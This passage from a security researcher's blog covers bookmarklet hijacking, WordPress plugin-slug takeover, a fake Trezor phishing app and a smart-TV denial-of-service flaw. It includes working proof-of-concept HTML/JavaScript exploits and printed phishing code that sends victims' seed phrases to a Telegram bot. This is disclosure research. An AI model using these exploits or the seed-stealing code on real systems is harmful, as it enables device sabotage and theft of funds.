My security engineering mindset got me thinking about the security implications of saving bookmarklets (JavaScript links) from other websites, especially when readers share links to GitHub gists.
We already know that executing any untrusted JavaScript is a bad move. People have been tricked into pasting snippets into the browser console on popular websites and got hacked that way. There have even been massive phishing campaigns using malicious bookmarklets against Discord users.
But what if the victim is cautious and examines the content of a bookmarklet's JavaScript before saving it to their bookmarks? People often hover over links to see whether they lead to malicious sites.
So I thought about changing the content right before the user saves it to bookmarks and experimented with the `dragstart` event. I came up with a very simple Proof of Concept for Chromium-based browsers and Firefox: https://gist.github.com/vavkamil/0b167814cabf8787cd4c4ab629614c6e.
It’s a simple PoC where the href attribute specifies the link’s destination:
`javascript: (() => { alert(1); })();`
And after saving to bookmarks, it changes to:
`javascript: (() => { alert(2); })();`
You can see it here: https://xss.vavkamil.cz/bookmarklet.html
<html>
<head>
<title>Bookmarklet hijacking PoC</title>
</head>
<body>
<h1>Bookmarklet hijacking</h1>
<h2>Chromium Proof of Concept</h2>
<h3>Steps to reproduce</h3>
<p>1. <strong>Double-check that the link executes</strong> <code>alert(1)</code></p>
<p>2. <strong>Drag & drop the link to Bookmarks (tool)bar</strong></p>
<p>3. <strong>Double-check that the link executes</strong> <code>alert(1)</code></p>
<p>4. <strong>Click the link in Bookmarks; it executes</strong> <code>alert(2)</code></p>
<br>
<a href="javascript: (() => { alert(1); })();" id="myLink" draggable="true">Save this cool bookmarklet!</a>
<script>
  const linkElement = document.getElementById('myLink');
  const originalLink = linkElement.href;

  linkElement.addEventListener('dragstart', function(event) {
    const newLink = "javascript: (() => { alert(2); })();";
    event.target.href = newLink;
    // Set the data for the drag event to the new link
    event.dataTransfer.setData('text/uri-list', newLink);
    event.dataTransfer.setData('text/plain', newLink);
    console.log('Link location changed to:', event.target.href);
  });

  linkElement.addEventListener('dragend', function(event) {
    // Reset the link back to its original value after the drag operation has ended
    event.target.href = originalLink;
    console.log('Link location reset to:', event.target.href);
  });
</script>
<hr>
<h2>Firefox Proof of Concept</h2>
<h3>Steps to reproduce</h3>
<p>1. <strong>Double-check that the link executes</strong> <code>alert(1)</code></p>
<p>2. <strong>Right-click & Bookmark link... & Save</strong></p>
<p>3. <strong>Double-check that the link executes</strong> <code>alert(1)</code></p>
<p>4. <strong>Click the link in Bookmarks; it executes</strong> <code>alert(2)</code></p>
<br>
<a href="javascript: (() => { alert(1); })();" id="myLink_2">Save this cool bookmarklet!</a>
<script>
  const linkElement_2 = document.getElementById('myLink_2');
  const originalLink_2 = linkElement_2.href;

  linkElement_2.addEventListener('mousedown', function(event) {
    const newLink = "javascript: (() => { alert(2); })();";
    event.target.href = newLink;
    console.log('Link location changed to:', event.target.href);
  });

  linkElement_2.addEventListener('mouseover', function(event) {
    // Reset the link back to its original value when the pointer hovers over it
    event.target.href = originalLink_2;
    console.log('Link location reset to:', event.target.href);
  });
</script>
</body>
</html>
I recently did a routine secure code review of a WordPress instance and noticed a new internally developed plugin. It occurred to me that if an attacker were able to claim the plugin’s slug and upload a malicious version to the WordPress Plugin Directory, the site might show an update notification once the SVN version is bumped higher than the installed one.
That would introduce the “Confused deputy problem” attack scenario, where the privileged user, instructed to update all plugins regularly, inadvertently infects the instance with malware.
One could argue that the confused deputy shouldn’t blindly update plugins without checking the changelog first, but honestly, updates are released so often that checking quickly becomes monotonous. And we shouldn’t put them in that position in the first place: relying on an outside attacker not figuring out the plugin’s name is security through obscurity.
To confirm the hypothesis, I began researching whether it is, in fact, a possible attack vector and how widespread it is.
WordPress.org offers free hosting to anyone who wishes to develop a plugin. All code in the directory should be as secure as possible, but security is the ultimate responsibility of the plugin developer.
The WordPress.org Plugin Directory is the easiest way for potential users to download and install any plugin. Once a new plugin is approved, the developer gets access to a Subversion (SVN) repository. The SVN repository is a release repository, not a development one: any commit, whether code or readme files, triggers a regeneration of the zip files associated with the plugin.
WordPress’ integration with the plugin directory means the user can update the plugin in a couple of clicks. Users are alerted to updates when the plugin version in SVN increases.
In theory, anyone following the guidelines and passing the review process can upload a plugin and distribute a malicious version later. Unfortunately, while reading the developer documentation, I found the following info:
> **Why is my submission failing saying my plugin name already exists?** You’re trying to use a plugin with a permalink that exists outside WordPress.org and has a significant user base. It’s important to understand that the way the plugin update API works is that it compares the plugin folder name (i.e. the permalink) to every plugin it has hosted on WordPress.org. If there’s a match, then it checks for updates and users are prompted to upgrade. When that happens, users of the ‘original’ plugin (the one we don’t host) would upgrade to the one from WordPress.org and, if that isn’t what you actually wanted to do, you could break their sites. Sometimes this situation develops when a company or person releases their plugin privately (via Github for example) and decides they want to re-release it on WordPress.org. In those cases, we recommend you email us and we’ll walk you through how to get past the error.
This implies that the WordPress security team internally tracks unclaimed plugin names used in the wild, along with their installation counts, and that some magic threshold value prevents a large-scale supply chain attack. But it also validates the assumption that the attack vector is indeed possible.
Most business websites using WordPress have a custom theme, and the slug name is almost always in the HTML source code to load JS/CSS files from the theme’s asset directory. Detecting the theme slug and taking over the unclaimed ones would be the easiest way.
The WordPress Theme Directory does have a rigorous theme review process and review requirements to ensure quality and security. New themes are generally held to a higher standard to attract new users.
It would be hard for me to develop a frontend appealing to a general audience and pass the review, so I decided not to worry about them.
On the other hand, it’s impossible to detect most plugins via a passive check, and it will be tough to create a custom wordlist. But the review process for WordPress Plugin Directory is not that strict, and the guidelines are relatively simple.
While reading the docs, I was mainly interested in the restrictions on plugin names. Being already familiar with WordPress, I knew that a slug can only contain lowercase alphanumeric characters separated by dashes, but I also learned there are more restrictions:
> Plugins must respect trademarks, copyrights, and project names. Names cannot be “reserved” for future use or to protect brands. The use of trademarks or other projects as the sole or initial term of a plugin slug is prohibited unless proof of legal ownership/representation can be confirmed. This policy extends to plugin slugs, and we will not permit a slug to begin with another product’s term.
That threw me off, because apparently there is a check for trademarked brands, which protects most companies and prohibits uploading unclaimed plugins (assuming they use their company name as a prefix for internal plugins). I didn’t want to give up yet, so I started digging around, and it turns out the WordPress team is a fan of transparency: the whole approval process is automated and, most importantly, fully open source.
By reviewing the [class-upload-handler.php](https://meta.trac.wordpress.org/browser/sites/trunk/wordpress.org/public_html/wp-content/plugins/plugin-directory/shortcodes/class-upload-handler.php) checks, we can see a couple of essential functions:
`process_upload()`

```php
$this->plugin_slug = remove_accents( $this->plugin['Name'] );
$this->plugin_slug = preg_replace( '/[^a-z0-9 _.-]/i', '', $this->plugin_slug );
$this->plugin_slug = str_replace( '_', '-', $this->plugin_slug );
$this->plugin_slug = sanitize_title_with_dashes( $this->plugin_slug );
```
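For readers who don’t speak PHP, the slug derivation in `process_upload()` can be approximated in Python. This is a rough sketch of my own: `sanitize_title_with_dashes()` does more than this stand-in, so treat it as an illustration, not a faithful port.

```python
import re
import unicodedata

def approx_plugin_slug(name: str) -> str:
    # remove_accents(): strip diacritics down to plain ASCII
    s = unicodedata.normalize("NFKD", name).encode("ascii", "ignore").decode("ascii")
    # keep only letters, digits, spaces, underscores, dots, and dashes
    s = re.sub(r"[^a-zA-Z0-9 _.-]", "", s)
    # underscores become dashes
    s = s.replace("_", "-")
    # rough stand-in for sanitize_title_with_dashes(): lowercase and
    # collapse whitespace/dots into single dashes
    s = s.lower()
    s = re.sub(r"[\s.]+", "-", s.strip())
    return re.sub(r"-+", "-", s).strip("-")
```

For example, a plugin named `My_Cool Plugin!` would end up with the slug `my-cool-plugin`.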
`has_reserved_slug()`

```php
public function has_reserved_slug() {
	$reserved_slugs = array(
		// Plugin Directory URL parameters.
		'about',
		'admin',
		'browse',
		'category',
		'developers',
		'developer',
```
`has_trademarked_slug()`

```php
public function has_trademarked_slug() {
	$trademarked_slugs = array(
		'adobe-',
		'adsense-',
		'advanced-custom-fields-',
		'adwords-',
		'akismet-',
		'all-in-one-wp-migration',
		'amazon-',
		'android-',
		'apple-',
		'applenews-',
		'aws-',
```
Surprisingly, big enough (FAANG-style) companies can request to be added to the list (`$trademarked_slugs`) of prohibited terms, and any upload of a plugin containing that name will automatically fail. Most importantly, there is also a check preventing uploads that use popular plugin names already in the wild:
```php
if ( function_exists( 'wporg_stats_get_plugin_name_install_count' ) ) {
	$installs = wporg_stats_get_plugin_name_install_count( $this->plugin['Name'] );

	if ( $installs && $installs->count >= 100 ) {
		$error = __( 'Error: That plugin name is already in use.', 'wporg-plugins' );
```
In conclusion, the WordPress Plugin Confusion attack against internally developed plugins on business websites is indeed possible. Still, the security mechanism prevents large-scale supply chain attacks against unclaimed plugins installed on more than 100 websites.
I wrote a simple tool, wp_update_confusion.py, which passively detects plugins from the front-page response and checks whether each plugin name contains only the allowed characters. It then pings the WordPress SVN to verify whether the slug is already claimed.
While scanning the websites of HackerOne public bug bounty programs, the tool reported a ton of false positives. I quickly realized that it would be impossible to get meaningful output without a database of paid WordPress plugins, and building one myself would require a significant amount of time.
Instead of reinventing the wheel and knowing from the review process code that the WordPress team already has the data, I started looking around the website. Every plugin has an “Advanced View” tab, where one can see various graphs, such as active versions, downloads per day, install growth, etc.
Poking around the API revealed one publicly available endpoint, which in fact returns the all-time number of downloads for any plugin slug, even an unclaimed one:
https://api.wordpress.org/stats/plugin/1.0/downloads.php?slug={plugin_name}&historical_summary=1
In the end, having all the information needed to verify whether a plugin could be taken over produced much better results. I didn’t implement a brute-force option, which would probably be the best way to earn bug bounties, so right now the tool is only capable of detecting low-hanging fruit :)
The way it works is:
1) Query the front page and find all the plugins: `re.findall("wp-content/plugins/(.*?)/", html)`
2) Check if the slug is allowed
3) Check if the slug is present in the SVN registry
4) Check if the slug is installed on more than 100 websites
5) Profit?
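The steps above can be sketched roughly like this. The function names are mine, not necessarily those used in wp_update_confusion.py, and the network-touching parts are only illustrated:

```python
import re
import urllib.error
import urllib.request

# A claimable slug: lowercase alphanumerics separated by single dashes
SLUG_RE = re.compile(r"^[a-z0-9]+(-[a-z0-9]+)*$")

def find_plugin_slugs(html: str):
    # Step 1: passively extract plugin slugs from the front-page HTML
    return sorted(set(re.findall(r"wp-content/plugins/(.*?)/", html)))

def is_claimable_slug(slug: str) -> bool:
    # Step 2: only slugs made of allowed characters can be registered
    return bool(SLUG_RE.match(slug))

def slug_in_svn(slug: str) -> bool:
    # Step 3: an existing directory in the SVN registry means the slug is taken
    try:
        urllib.request.urlopen(f"https://plugins.svn.wordpress.org/{slug}/")
        return True
    except urllib.error.HTTPError:
        return False

def stats_url(slug: str) -> str:
    # Step 4: the public endpoint returning all-time downloads for a slug
    return ("https://api.wordpress.org/stats/plugin/1.0/downloads.php"
            f"?slug={slug}&historical_summary=1")
```

Anything that passes steps 1–2, is absent from SVN, and shows a meaningful install base is a candidate for step 5.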
The next step was to debug exactly how the plugin update mechanism works. The easiest solution would be to review the code, but since I’m not that familiar with PHP, a black-box-style test sounded like a better idea.
Since I like Burp Suite a lot, I decided to intercept the requests between the website and the wordpress.org API via its proxy. Running WordPress in a Docker container is easy, but installing the SSL certificate and routing all the external traffic through Burp wasn’t that simple.
After a lot of debugging, I came up with the following:
1) Configure a Proxy Listener to listen on all interfaces
2) Add the IP address of the proxy as `extra_hosts` in `docker-compose.yml`
3) Run Docker and install WordPress via wp-cli
4) Download & install the Burp Suite certificate:

```sh
#!/usr/bin/env sh
# Download & install Burp Suite certificate
wget -q http://burp:8080/cert -O cert.der
openssl x509 -in cert.der -inform DER -out cert.pem
mkdir /usr/local/share/ca-certificates/extra
cp cert.pem /usr/local/share/ca-certificates/extra/cert.crt
update-ca-certificates
rm cert.der cert.pem
```

5) Redirect all requests received by the listener to my host
6) Replace all occurrences of `api.wordpress.org` with my host
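For step 2, a hypothetical `docker-compose.yml` fragment might look like the following. The IP `172.17.0.1` is an assumption for the Docker host running Burp’s listener; adjust it to your setup:

```yaml
services:
  wordpress:
    image: wordpress
    extra_hosts:
      # lets the container fetch the CA cert as http://burp:8080/cert
      - "burp:172.17.0.1"
      # routes API traffic to the invisible proxy listener
      - "api.wordpress.org:172.17.0.1"
```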
You can see the final script here: https://github.com/vavkamil/wp2burp
After that, I could see that when the website checks whether any updates are available, it issues the following request:
```http
POST /plugins/update-check/1.1/ HTTP/2
Host: api.wordpress.org
User-Agent: WordPress/5.3; http://127.0.0.1:31337/
Accept: */*
Accept-Encoding: gzip, deflate
Referer: https://api.wordpress.org/plugins/update-check/1.1/
Connection: close
Content-Length: 1778
Content-Type: application/x-www-form-urlencoded
Expect: 100-continue

plugins={...}
```
Where the JSON data contains a list of all installed plugins, e.g.:
```json
{
    "akismet\/akismet.php":{
        "Name":"Akismet Anti-Spam",
        "PluginURI":"https:\/\/akismet.com\/",
        "Version":"4.1.3",
        "Description":"Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam<\/strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.",
        "Author":"Automattic",
        "AuthorURI":"https:\/\/automattic.com\/wordpress-plugins\/",
        "TextDomain":"akismet",
        "DomainPath":"",
        "Network":false,
        "RequiresWP":"",
        "RequiresPHP":"",
        "Title":"Akismet Anti-Spam",
        "AuthorName":"Automattic"
    },
```
If there is a new version available, the website receives the following response:
```http
HTTP/2 200 OK
Date: Sun, 10 Oct 2021 19:13:57 GMT
Content-Type: application/json
Access-Control-Allow-Origin: *
Cf-Cache-Status: DYNAMIC
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NpTdm3rT6Twj%2FvltPnM2Lb627HEIH4tcXE%2FTqUW0ZSqB7QQlDef1ttcmizy5cx2qcGwpKR%2BmudmYA0tp0G5QVEJ8G4%2Fu%2Bh07GKDQfbBYlJext3lDiKXRNB0EHIi3lD35oLk%3D"}],"group":"cf-nel","max_age":604800}
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Cf-Ray: 69c22b4018442794-PRG
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

{"plugins":{"akismet\/akismet.php":{"new_version":"4.2.1","package":"https:\/\/downloads.wordpress.org\/plugin\/akismet.4.2.1.zip"}}}
```
If you click the update button, WordPress deletes the contents of the old plugin directory, and the .zip file containing the new version is downloaded and unzipped, effectively replacing all the files. Ethically exploiting this is tricky because any Proof of Concept will break the website.
But using the Docker container to intercept and simulate the attack might be enough, as you can modify the response so that it contains any version & remote zip file you want.
I didn’t want to claim anyone’s plugin, as the update would inadvertently break the website (the old plugin files would get deleted). Still, I had to simulate the attack to confirm that it works.
Fortunately for me, I had already written a simple WP plugin two years ago, “XML-RPC Settings”, to understand how the various “xmlrpc.php” attack vectors work and how to defend against them. I never bothered to upload it to the WordPress Plugin Directory, but there was a possibility that someone had installed it from my GitHub. For example, it was on this blog before I migrated to GitHub Pages. To be sure, I installed the plugin on six different websites a while ago, when I was thinking about starting this research.
After reading WordPress developer guidelines and updating the readme, I submitted the plugin for review. The exact timeline was:
One hour after the plugin was approved, I was granted commit access to the Subversion (SVN) repository and uploaded my plugin:
```sh
$ sudo apt-get install subversion
$ svn co https://plugins.svn.wordpress.org/xml-rpc-settings wordpress/
$ cp xml-rpc-settings/* wordpress/.
$ cd wordpress
$ svn add trunk/*
$ svn ci -m 'feat(xml-rpc-settings): Add plugin files'
```
Just like that, the plugin was released; now I had to wait until the WordPress Plugin Directory synced with SVN. After a while, I noticed a Wordfence Slack notification telling me that it had found a problem on a couple of websites and that a new plugin update was available. Bingo!
I was able to hijack a plugin installed on a couple of websites. There isn’t any backdoor, of course; you can check the plugin yourself:
https://wordpress.org/plugins/xml-rpc-settings
On the other hand, an attacker would now have a foothold in the website. Even worse if the website admin enables automatic plugin updates, introduced in WordPress 5.5: that would allow the attacker to change plugin files anytime they wanted, without any user interaction.
As this is essentially vulnerable by design, I wouldn’t expect a fix from the WordPress side. If you are a big enough company, you can contact them and get your trademark into the `$trademarked_slugs` list. Since uploading a “dummy” plugin to the registry is not allowed, one must find another way. You can follow a couple of recommendations to keep your site secured.
> The theme slug is the name of the theme in lower case, with spaces replaced by a hyphen (-). It is also the folder name for the theme. The themes team can decline themes based on the name and request that the name is changed if they decide that the name is inappropriate or too similar to an existing theme or brand.
That means that, to be on the safe side, you can rename your custom theme in the following way: `theme-internal_name`.
WordPress 5.8, released on July 20, 2021, introduced a new “Update URI” plugin header. This allows third-party plugins to avoid accidentally being overwritten by an update of a similarly named plugin from the WordPress.org Plugin Directory. It gives the website maintainer an effective way to prevent the supply chain attack, as the internal plugin will never ask for updates. The main PHP file should include the header comment `Update URI: false`, for example:
```php
<?php
/**
 * Plugin Name: Internal Plugin
 * Version: 1.0
 * Update URI: false
 */
```
You can read the full announcement here: https://make.wordpress.org/core/2021/06/29/introducing-update-uri-plugin-header-in-wordpress-5-8/
If, for any legacy reason, you can’t update to WordPress 5.8 and use the `Update URI` mitigation, you still have some options:
A plugin slug can only contain lowercase alphanumeric characters, with dashes as delimiters. Some keywords are prohibited as well, which could help us in this case. That means you can rename your custom plugins in any of the following ways:
- `internal_plugin_name`
- `InternalPluginName`
- `wp-internal-plugin-name`
It is also possible to leverage a hook and write a custom update function, blocking the internal WP API call and replacing it with your own, similar to how paid plugins offer custom updates from their own servers.
Some plugins do that for you, for example, Easy Updates Manager, which allows you to block updates for specific plugins.
That being said, you should always create a fresh backup and read the changelog before updating any plugins.
Since I don’t have my own recon DB anymore, I dumped about 200k subdomains from Chaos (public HackerOne programs with bounties) and scanned them with httpx:
```sh
httpx -random-agent -l chaos_all_hackerone.txt -match-string "wp-content" -o httpx_wordpress.txt
```
That resulted in approximately 427 WordPress websites. After verifying them with the Proof of Concept wp_update_confusion.py tool, I found 13 potential targets. That is not bad, considering the [8.2 High](https://chandanbn.github.io/cvss/#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L) severity.
After carefully reading the policy of each bug bounty program, I found out that more than half (7) of the potential targets are out of scope. That’s a bummer, as some belong to well-known companies, and they will probably fix it anyway after I release this research.
Either way, I ended up submitting six reports, one of them to a VDP program (not offering bounties).
https://twitter.com/vavkamil/status/1447160385954533378
After sharing a screenshot of the redacted submitted reports with a #0day hashtag on Twitter, I received a message from @naglinagli offering a collaboration: access to his extensive recon database, so I could scan the hosts with my payload, in exchange for splitting any future bug bounty payouts.
Since Nagli is usually among the top 5 researchers with the highest HackerOne reputation, I decided to take the offer, mainly to see how many vulnerable websites might be out there. Giving away 50% of potential bounties might be somewhat expensive, but I was pretty much done with my own scan anyway.
On the first try, we found more than twice as many vulnerable hosts as in my previous scan attempt. I must say the collaboration was awesome; I was impressed by how many high-profile targets he was able to find.
All in all, we submitted close to 25 reports. Unfortunately, a lot of them were closed as Informative. Some teams argued that their release process would not update the plugins, most likely thanks to CI/CD automation. Some didn’t understand the report, and some closed it because it was missing a clear Proof of Concept, arguing that it’s only a theoretical issue.
But others appreciated the submission, applied a fix, and one company even awarded us a bonus for the quality of the report. You can see an example report here: https://hackerone.com/reports/1364851
We ended up with approximately $4k in bounties, but most importantly, we made the Internet a little bit safer. It was very eye-opening how many top tech and world-known companies were potentially affected.
This research was presented as a talk at the OWASP Czech Chapter meeting on 25th November 2021.
A story about a person losing 7.1 bitcoin worth ~$600,000 due to a fake “Trezor” app in the App Store made the news very recently. According to the article, five people have reported having cryptocurrency stolen by the fake Trezor app on iOS, for total losses worth $1.6 million.
I saw another fake Trezor app pop up on the Google Play Store yesterday. People on Reddit were downloading the app to see what it does and to warn others. That caught my attention, because it’s generally not a good idea to blindly install something like this.
The Play Store listing had an almost five-star rating, a couple of primarily fake reviews, and around ~500 downloads. It looked somewhat believable to the casual user.
I pulled the .apk file from Play Store and decompiled it. From the first look, it was not malware, which was good.
```sh
$ sha256sum mobile-wallet-trezor-io_1.0.apk
1cc9a9748ccd210fb8aa06b1ae5b48ca3805eed12c670818a75e833733376b7f
```
In the “/sources/com/rzor/p034tr/MainActivity.java” file on line 206, we could see this message:
```java
MainActivity.this.mo4371l0("This app is created using an unauthorized copy of 'Website 2 APK Builder Pro' Software.", "Unauthorized App", "Shame on me!");
```
And on the line 1196:
```java
this.f2862z = "https://sliu3err-restaurant.com";
```
So the Android application was just a WebView wrapper around a phishing website. The only functionality was to enter the 12/24-word backup phrase to “connect” the Trezor. Anyone who uses a Trezor should know that you are never supposed to enter the seed anywhere else, but sadly, people still fall for it.
> Warning to all Trezor owners using Android devices!
>
> This app is malicious and has no relation to Trezor or SatoshiLabs. Please, don't install it.
>
> Remember that you should never share your seed with anyone until your Trezor device asks you to do it! pic.twitter.com/6C3iKfPDnR
>
> — Trezor (@Trezor) January 18, 2021
After getting access to the web server, just to look around and see how the backend works, I was surprised by how basic it was. In the “index.php” file was an IP logger:
```php
<?php
$dir = 'vixrs';
if (!is_dir($dir)) {
    mkdir($dir, 0777);
}

$file = date('Y-m-d').'.txt';
$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$ipInfo = grabIpInfo($_SERVER["REMOTE_ADDR"]);
$filename = $dir.'/'.$file;
$url = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";

$info = '
===========================
IP: '.$ip.'
Browser: '.$browser.'
Ipinfo: '.$ipInfo.'
Time: '.date('d/m/Y H:i:s a').'
Filename: '.basename($_SERVER['PHP_SELF']).'
URL: '.$url.'
';

file_put_contents($filename, $info, FILE_APPEND);

function grabIpInfo($ip)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, "http://ipwhois.app/json/$ip");
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    $returnData = curl_exec($curl);
    curl_close($curl);
    return $returnData;
}

$ipJsonInfo = json_decode($ipInfo);
?>
```
And in the “seed.php” file was the passphrase logger:
```php
<?php
$token = "16308!REDACTED!NyZV60tUX5ptudhtnSLj_nBNdo";
$data = ["text" => $_POST['seed'], 'chat_id' => '-59!REDACTED!38'];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data));
return true;
?>
```
Essentially, when the victim installed the Android app and entered their Trezor seed phrase, the Telegram bot immediately sent it to the group chat, and the scammers would begin the recovery phase to empty the cryptocurrency balance.
Having access to the Telegram API token, I invited myself to the chat group. Unfortunately, neither I nor the bot could see previous messages, so all I could do was say hello to the scammer. Their name was “Pinern nuere”, with the username “caerwe3423”.
There was nothing more to do, so I just disabled the bot so it could no longer forward the passphrases, and called it a night. In the morning, the fake app was no longer on the Play Store. Mission accomplished.
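With a leaked token, interacting with the bot boils down to plain Bot API calls. This is a minimal sketch of my own (the actual steps taken may have differed); the methods `getMe` and `leaveChat` are real Telegram Bot API methods, and the network calls are left commented out:

```python
import urllib.parse
import urllib.request

API = "https://api.telegram.org"

def method_url(token: str, method: str, **params) -> str:
    # Build a Bot API call URL, e.g. /bot<token>/getMe
    query = urllib.parse.urlencode(params)
    return f"{API}/bot{token}/{method}" + (f"?{query}" if query else "")

def call(token: str, method: str, **params) -> bytes:
    # Issue the call and return the raw JSON response
    with urllib.request.urlopen(method_url(token, method, **params)) as resp:
        return resp.read()

# Usage with the leaked token (network calls, so commented out):
# call(token, "getMe")                      # confirm the token is still valid
# call(token, "leaveChat", chat_id="-59...")  # make the bot leave the group
```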
Since I grabbed the IP logs over a couple of days, I can share some stats. The backend was reused for all variations of the scam. Most of the hits were from phones, with a wide range of Android versions, from all over the world:
Day one:
Day two:
Day three:
Day four:
Day five:
I don’t know how many of them were compromised, but hopefully zero.
https://play.google.com/store/apps/details?id=com.tzr.trz2
I bought myself a smart TV for Christmas. It’s the first TV which I ever owned, so I was quite excited about it, but at the same time, I didn’t want something fancy. It was hard to find something with 4k resolution without a camera/microphone and unnecessary functions, potentially increasing the attack surface. I ended up buying an ordinary one with YouTube & Netflix support (SRT 43UB6203 (43”/108 cm) - 10 bit).
After unboxing and setting it up, the first thing I did was a firmware update. The latest software version is:

```
Current version: V8-MS586EU-LF1V104
Product name: 43D1901
Date: May 23 2019 08:38:07
```
After the update, I continued with an nmap scan to see which ports (if any) were exposed:
```
vavkamil@xexexe:~$ nmap -p- 10.10.10.249

Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-07 19:05 CET
Nmap scan report for 10.10.10.249
Host is up (0.0064s latency).
Not shown: 65525 closed ports
PORT      STATE SERVICE
4123/tcp  open  z-wave
5978/tcp  open  ncd-diag-tcp
8989/tcp  open  sunwebadmins
51604/tcp open  unknown
52091/tcp open  unknown
54656/tcp open  unknown
55028/tcp open  unknown
55683/tcp open  unknown
55699/tcp open  unknown
61414/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
```
I don’t know if that’s normal or what I was even expecting, but I was most interested in finding some web interface, since I mostly do web security stuff. Unfortunately, after trying each IP:port combination in the browser, there wasn’t anything useful.
So I tried Burp Suite’s “Discover content” scan from the “Engagement tools” section. Some ports were not responding at all, or served only XML configs, most likely for the FastCast/Miracast feature (UPnP/1.0 AwoX/1.1) used to cast YouTube videos from a phone. Then I hit the jackpot and found what I was looking for: the “admin” panel, without any authentication.
Looking at the Media Renderer Administration web interface, I was confident I had found a command injection and a possible RCE. There is an endpoint to change the Friendly Name, which is used to discover the TV and is visible during casting, and it says:
> Note: You can use the %hostname% variable as a placeholder for the actual device hostname.
I followed the instructions precisely and set the Friendly Name to %hostname%. To my surprise, it didn’t work; instead, the TV completely froze. The remote stopped working, the whole thing became unresponsive, and even the hardware buttons at the bottom did nothing. At that point, I was pretty disappointed, as I thought I had just bricked my one-hour-old television.
Only after unplugging the power cord for a hard reset did it return to normal. I kept messing with command injection payloads, but every attempt ended in a Denial of Service (DoS). Note that after each restart, the web interface listens on a different dynamic port (49152–65535), so one has to repeat the recon phase.
At that point, I summarized my notes and reached out to the vendor via the contact form on their website.
After a couple of days passed, I spent an evening writing a Proof of Concept to confirm that the issue is remotely exploitable. The first step was to determine the internal IP range. A WebRTC leak didn’t work for me, but since I also own Philips Hue smart light bulbs, I decided to work with that. Thanks to the CORS “misconfiguration”, any website you visit can learn the internal IP address of your Hue Bridge. You can see the source code or a PoC for that here.
```
vavkamil@xexexe:~$ curl -v -s https://discovery.meethue.com/
...
< HTTP/2 200
< access-control-allow-credentials: true
< access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, X-Token, X-Bridge
< access-control-allow-methods: GET, OPTIONS
< access-control-allow-origin: *
< cache-control: no-cache
< content-type: application/json; charset=utf-8
< content-length: 63
< via: 1.1 google
< alt-svc: clear
<
[{"id":"ecb5fafffe128375","internalipaddress":"10.10.10.253"}]
* Connection #0 to host discovery.meethue.com left intact
```
After discovering the internal IP range, we can leverage the fact that there is always a service listening on port 4123 and port-scan for it. Thanks to the lack of X-Frame-Options, we can try to load each IP:port pair in an iframe. Unfortunately, the connection to port 4123 will hang, but it will eventually load after about 1:30 minutes (at least in Mozilla Firefox). We can either wait or use a timer on the iframe to detect that it’s loading.
vavkamil@xexexe:~$ curl http://10.10.10.249:4123
curl: (1) Received HTTP/0.9 when not allowed
vavkamil@xexexe:~$ telnet 10.10.10.249 4123
Trying 10.10.10.249...
Connected to 10.10.10.249.
Escape character is '^]'.
<?xml version="1.0" encoding="utf-8"?><root><response>true</response></root>
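If you are already on the LAN, the same sweep is trivial without a browser. Here is a rough Python analogue (the port number 4123 and the /24 expansion match the PoC; the helper names and timeout are my own, and the actual PoC has to fall back to iframes because a web page has no raw sockets):

```python
import socket

def ip_to_range(ip: str) -> list[str]:
    """Expand a known internal IP (e.g. the Hue bridge) into its /24 neighbours."""
    parts = ip.split(".")
    if len(parts) != 4:
        return []
    prefix = ".".join(parts[:3])
    return [f"{prefix}.{i}" for i in range(1, 255)]

def tv_listening(ip: str, port: int = 4123, timeout: float = 0.5) -> bool:
    """Return True if something answers on TCP 4123 (the TV's always-on service)."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False

# Usage (not run here): sweep the /24 derived from the Hue bridge address
# candidates = [ip for ip in ip_to_range("10.10.10.253") if tv_listening(ip)]
```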
Once we know the smart TV’s internal IP address, we have to scan all of its dynamic ports to find the Media Renderer Administration. I used the same technique that is popular in router exploit kits: loading the admin panel logo in an <img> tag. Then it’s just a matter of sending one unauthenticated GET request to cause a Denial of Service that lasts until the power cord is unplugged:
http://{IP:PORT}/web/admin/setFriendlyName?name=%hostname%
The Proof of Concept code is very messy and could be optimized to be much faster, but it works :)
<html>
<head>
<title></title>
</head>
<body>
<h1>Strong TV DoS exploit</h1>
<h2>Proof of Concept</h2>
<label for="internal_ip">Any internal IP:</label>
<input type="text" name="internal_ip" id="internal_ip" autocomplete="off" onchange="get_tv_ip()">
<br><br>
<label for="tv_ip">Smart TV IP:</label>
<input type="text" name="tv_ip" id="tv_ip" autocomplete="off" onchange="scan_tv_ports(this.value)">
<br><br>
<label for="tv_port">Smart TV Port:</label>
<input type="text" name="tv_port" id="tv_port" autocomplete="off"> <em>This may take a couple of minutes</em>
<br><br>
<label for="web_admin">Media Renderer Administration:</label>
<input type="text" name="web_admin" id="web_admin" autocomplete="off">
<br><br>
<label for="exploit_code">Exploit code:</label>
<textarea name="exploit_code" id="exploit_code" autocomplete="off" style="width:680px;height:130px;"></textarea>
<br><br>
<label for="exploit_poc">Exploit:</label>
<a href="#" name="exploit_poc" id="exploit_poc" target="_blank">Proof of Concept</a>
<br><br>
<script>
get_hue_ip();
async function scan_tv_ports(ip) {
var check = 0;
// dynamic ports 49152 - 65535
var ports = get_ports_array(49152,65535);
for (var i = 0; i < ports.length; i++) {
if(check != 0) { break; }
await new Promise(resolve => setTimeout(resolve, 50));
var img = document.createElement("img");
img.setAttribute("src", "http://"+ip+":"+ports[i]+"/web/file/largeIco.jpg");
img.style.width = "10px";
img.style.height = "10px";
//img.style.display = "none";
